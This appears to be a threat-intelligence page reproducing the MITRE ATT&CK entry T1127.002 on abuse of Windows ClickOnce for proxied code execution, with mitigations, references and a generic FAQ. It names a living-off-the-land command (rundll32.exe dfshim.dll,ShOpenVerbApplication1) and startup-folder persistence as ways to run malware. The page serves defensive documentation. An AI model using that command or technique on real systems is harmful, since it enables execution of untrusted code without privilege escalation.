Description
Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on User Execution. When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a Rundll32 script using the command rundll32.exe dfshim.dll,ShOpenVerbApplication1.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., Registry Run Keys / Startup Folder).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
Platforms
Mitigations (3)
Disable or Remove Feature or ProgramM1042
Disable ClickOnce installations from the internet using the following registry key:
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\TrustManager\PromptingLevel — Internet:Disabled(Citation: NetSPI ClickOnce)(Citation: Microsoft Learn ClickOnce Config)
ClickOnce may not be necessary within an environment and should be disabled if not being used.
Restrict Web-Based ContentM1021
Disable ClickOnce installations from the internet using the following registry key:
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\TrustManager\PromptingLevel — Internet:Disabled(Citation: NetSPI ClickOnce)
Code SigningM1045
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.(Citation: Microsoft Learn ClickOnce and Authenticode)
References
- LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
- Microsoft. (2023, September 14). ClickOnce security and deployment. Retrieved September 9, 2024.
- Nick Powers. (2023, June 7). Less SmartScreen More Caffeine: (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.
- Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce Love Story. Retrieved September 9, 2024.
- William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution & C2. Retrieved September 9, 2024.
- William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE IN: When .appref-ms abuse is operating as intended. Retrieved September 9, 2024.
Frequently Asked Questions
What is T1127.002 (ClickOnce)?
T1127.002 is a MITRE ATT&CK technique named 'ClickOnce'. It belongs to the Stealth, Execution tactic(s). Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a dep...
How can T1127.002 be detected?
Detection of T1127.002 (ClickOnce) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1127.002?
There are 3 documented mitigations for T1127.002. Key mitigations include: Disable or Remove Feature or Program, Restrict Web-Based Content, Code Signing.
Which threat groups use T1127.002?
While specific threat group attribution may vary, this technique has been observed in various real-world attacks. Check the MITRE ATT&CK website for the latest threat intelligence.